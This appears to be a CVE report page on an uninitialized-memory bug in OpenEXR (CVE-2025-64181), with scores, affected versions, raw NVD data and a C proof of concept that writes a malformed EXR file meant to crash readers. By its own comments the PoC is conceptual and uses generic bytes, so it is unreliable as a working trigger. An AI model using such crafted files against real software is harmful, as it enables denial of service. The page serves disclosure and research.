Security Vulnerability Report
CVE-2025-64181 CVSS 7.5 HIGH

CVE-2025-64181

Published: 2025-11-10 22:15:37
Last Modified: 2025-12-08 15:59:59

Description

OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2, while fuzzing `openexr_exrcheck_fuzzer`, Valgrind reports a conditional branch depending on uninitialized data inside `generic_unpack`. This indicates a use of uninitialized memory. The issue can result in undefined behavior and/or a potential crash/denial of service. Versions 3.3.6 and 3.4.3 fix the issue.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE (OpenEXR 3.3.0 - 3.3.5)
cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:* - VULNERABLE (OpenEXR 3.4.0 - 3.4.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Minimal PoC for CVE-2025-64181: OpenEXR uninitialized memory in generic_unpack
// This is a conceptual proof-of-concept showing the vulnerability trigger

// Generate a malformed EXR file that triggers uninitialized memory usage.
// Returns 0 on success, -1 if the output file could not be opened.
int generate_malformed_exr(const char* filename) {
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror("fopen");
        return -1;
    }

    // EXR magic number
    unsigned char magic[4] = {0x76, 0x2f, 0x31, 0x01};
    fwrite(magic, 1, 4, fp);

    // Version field - crafted to trigger parse path with uninitialized data
    unsigned char version[4] = {0x02, 0x00, 0x00, 0x00};
    fwrite(version, 1, 4, fp);

    // Add malformed chunk data that triggers generic_unpack
    // The exact bytes depend on specific OpenEXR version
    unsigned char chunk_header[8] = {0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF};
    fwrite(chunk_header, 1, 8, fp);

    // Incomplete/compressed data to trigger uninitialized memory read
    unsigned char payload[256];
    memset(payload, 0x41, 256);
    fwrite(payload, 1, 256, fp);

    fclose(fp);
    return 0;
}

int main(int argc, char* argv[]) {
    if (argc < 2) {
        printf("Usage: %s <output_exr_file>\n", argv[0]);
        return 1;
    }
    // Report success only if the file was actually written
    if (generate_malformed_exr(argv[1]) != 0) {
        return 1;
    }
    printf("Malformed EXR file generated: %s\n", argv[1]);
    return 0;
}

// To trigger: Compile and run, then open with exrcheck or any OpenEXR-using application
// Expected result: Program crash or Valgrind uninitialized memory warning

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64181", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:36.933", "lastModified": "2025-12-08T15:59:58.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2, while fuzzing `openexr_exrcheck_fuzzer`, Valgrind reports a conditional branch depending on uninitialized data inside `generic_unpack`. This indicates a use of uninitialized memory. The issue can result in undefined behavior and/or a potential crash/denial of service. Versions 3.3.6 and 3.4.3 fix the issue."}, {"lang": "es", "value": "OpenEXR proporciona la especificación y la implementación de referencia del formato de archivo EXR, un formato de almacenamiento de imágenes para la industria cinematográfica. En las versiones 3.3.0 a 3.3.5 y 3.4.0 a 3.4.2, al realizar fuzzing en 'openexr_exrcheck_fuzzer', Valgrind informa una bifurcación condicional que depende de datos no inicializados dentro de 'generic_unpack'. Esto indica un uso de memoria no inicializada. El problema puede resultar en un comportamiento indefinido y/o un posible crash/denegación de servicio. 
Las versiones 3.3.6 y 3.4.3 solucionan el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-457"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-3h9h-qfvw-98hq", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/user-attachments/files/23024726/archive0.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024736/archive1.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024740/archive2.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024744/archive3.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/user-attachments/files/23024746/archive4.zip", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https:/ ... (truncated)